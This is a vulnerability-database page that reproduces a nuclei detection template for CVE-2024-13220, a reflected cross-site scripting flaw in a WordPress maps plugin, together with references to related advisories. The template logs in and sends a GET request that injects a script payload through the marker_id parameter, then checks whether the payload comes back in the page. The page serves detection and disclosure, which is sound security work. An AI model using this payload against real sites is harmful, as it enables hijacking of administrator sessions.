Lucene search
K

WordPress Google Map Professional - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Reflected XSS in WordPress Google Map Professional due to lack of input sanitization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13220
31 Jan 202506:16
circl
CNNVD
WordPress plugin WordPress Google Map Professional 安全漏洞
31 Jan 202500:00
cnnvd
CVE
CVE-2024-13220
31 Jan 202506:00
cve
Cvelist
CVE-2024-13220 Google Map Professional <= 1.0 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51439
3 Oct 202520:07
euvd
NVD
CVE-2024-13220
31 Jan 202506:15
nvd
Patchstack
WordPress Google Map Professional plugin <= 1.0 - Reflected XSS vulnerability
31 Jan 202508:36
patchstack
Positive Technologies
PT-2025-2074
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13220
23 May 202507:10
redhatcve
Vulnrichment
CVE-2024-13220 Google Map Professional <= 1.0 - Reflected XSS
31 Jan 202506:00
vulnrichment
Rows per page
id: CVE-2024-13220

info:
  name: WordPress Google Map Professional - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    WordPress Google Map Professional (Map In Your Language) plugin through 1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires victim to load a maliciously crafted URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or session hijacking.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/33ef27b4-e88f-46ec-9b3f-0a3e16d6f82e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13220
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13220
    cwe-id: CWE-79
    epss-score: 0.00565
    epss-percentile: 0.42811
    cpe: cpe:2.3:a:pragmasoftwares:google_map_professional:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pragmasoftwares
    product: google_map_professional
  tags: cve,cve2024,google-map-professional,wordpress,wp,xss,wp-plugin,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=googlemarker-admin&marker_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "Edit Map")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100aec95f2a1e8853bf0b499333f94503dddbc7c9e7f7615e1f1bcd15479d2ff79e022100be0a26e6fe1f4d2a7b18b7e73954f4464a488f5939eb48c45d349fdbd3c238dd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 13:36Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00565
SSVC
5